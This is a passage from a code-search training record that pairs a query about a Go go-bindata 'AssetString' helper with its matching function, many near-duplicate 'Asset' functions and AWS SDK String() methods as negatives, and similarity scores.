&os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, fmt.Errorf(\"Asset %s not found\", name)\n}" ]
[ "0.73482424", "0.7267638", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7104654", "0.7069936", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481", "0.7067481" ]
0.709527
74
AssetString returns the asset contents as a string (instead of a []byte).
func AssetString(name string) (string, error) { data, err := Asset(name) return string(data), err }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (s GetAssetOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s GetAssetOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func String() string {\n\tbuffer := bytes.Buffer{}\n\tfor _, name := range AssetNames() {\n\t\tbytes := MustAsset(name)\n\t\tbuffer.Write(bytes)\n\n\t\tif len(bytes) > 0 && bytes[len(bytes)-1] != '\\n' {\n\t\t\tbuffer.WriteByte('\\n')\n\t\t}\n\t}\n\treturn buffer.String()\n}", "func (a Asset) String() (result string, err error) {\n\tdefer func() {\n\t\tif r := recover(); r != nil {\n\t\t\tmsg := fmt.Sprintf(\"failed to build URL: %v\", r)\n\t\t\ta.logger.Error(msg)\n\t\t\tresult = \"\"\n\t\t\terr = errors.New(msg)\n\t\t}\n\t}()\n\n\tassetURL := joinUrl([]interface{}{a.distribution(), a.assetType(), a.signature(), a.Transformation, a.version(), a.source()})\n\tquery := a.query()\n\n\treturn joinNonEmpty([]interface{}{assetURL, query}, \"?\"), nil\n}", "func (s RedshiftDataShareAsset) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s S3SnapshotAsset) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s GetAssetInput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s GetAssetInput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s SendApiAssetOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s ApiGatewayApiAsset) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s DeleteAssetOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s DeleteAssetOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s S3DataAccessAsset) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s UpdateAssetOutput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func Asset(name string) ([]byte, error) {\n\treturn _escFSByte(false, \"/\"+name)\n}", "func Asset() string {\n\treturn \"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\"\n}", "func (s AssetDetails) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s AssetEntry) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (p *Path) SourceAssetString() string {\n\tif p.sourceAssetString == \"\" {\n\t\tp.sourceAssetString = p.SourceAsset.String()\n\t}\n\treturn p.sourceAssetString\n}", "func (s LakeFormationDataPermissionAsset) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (s SendApiAssetInput) String() string {\n\treturn awsutil.Prettify(s)\n}", "func Asset() string {\n\treturn \"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